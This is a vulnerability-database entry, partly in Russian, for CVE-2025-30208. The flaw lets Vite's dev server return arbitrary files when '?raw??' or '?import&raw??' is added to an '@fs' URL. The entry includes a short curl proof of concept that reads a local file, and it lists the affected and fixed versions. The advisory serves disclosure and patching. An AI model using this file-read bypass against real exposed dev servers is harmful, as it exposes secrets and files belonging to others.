exploitDog

GHSA-x574-m823-4x7w

Опубликовано: 25 мар. 2025

Источник: github

Github: Прошло ревью

CVSS3: 5.3

Описание

Vite bypasses server.fs.deny when using ?raw??

Summary

The contents of arbitrary files can be returned to the browser.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?raw?? or ?import&raw?? to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as ? are removed in several places, but are not accounted for in query string regexes.

PoC

$ npm create vite@latest $ cd vite-project/ $ npm install $ npm run dev $ echo "top secret content" > /tmp/secret.txt # expected behaviour $ curl "http://localhost:5173/@fs/tmp/secret.txt" <body> <h1>403 Restricted</h1> <p>The request url "/tmp/secret.txt" is outside of Vite serving allow list. # security bypassed $ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??" export default "top secret content\n" //# sourceMappingURL=data:application/json;base64,eyJ2...

Ссылки

Пакеты

Наименование

vite

npm

Затронутые версииВерсия исправления

>= 6.2.0, < 6.2.3

6.2.3

Наименование

vite

npm

Затронутые версииВерсия исправления

>= 6.1.0, < 6.1.2

6.1.2

Наименование

vite

npm

Затронутые версииВерсия исправления

>= 6.0.0, < 6.0.12

6.0.12

Наименование

vite

npm

Затронутые версииВерсия исправления

>= 5.0.0, < 5.4.15

5.4.15

Наименование

vite

npm

Затронутые версииВерсия исправления

< 4.5.10

4.5.10

EPSS

Процентиль: 99%

0.81731

Высокий

5.3 Medium

CVSS3

CVE ID

Дефекты

CWE-200

CWE-284

Связанные уязвимости

CVE-2025-30208

CVSS3: 5.3

redhat

6 месяцев назад

Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.

CVE-2025-30208

CVSS3: 5.3

nvd

6 месяцев назад

Vite, a provider of frontend development tooling, has a vulnerability in versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. `@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes. The contents of arbitrary files can be returned to the browser. Only apps explicitly exposing the Vite dev server to the network (using `--host` or `server.host` config option) are affected. Versions 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 fix the issue.

CVE-2025-30208

CVSS3: 5.3

debian

6 месяцев назад

Vite, a provider of frontend development tooling, has a vulnerability ...

BDU:2025-03698

CVSS3: 6.5

fstec

6 месяцев назад

Уязвимость функции transformMiddleware механизма @fs локального сервера разработки приложений Vite, позволяющая нарушителю читать произвольные файлы

EPSS

Процентиль: 99%

0.81731

Высокий

5.3 Medium

CVSS3

CVE ID

Дефекты

CWE-200

CWE-284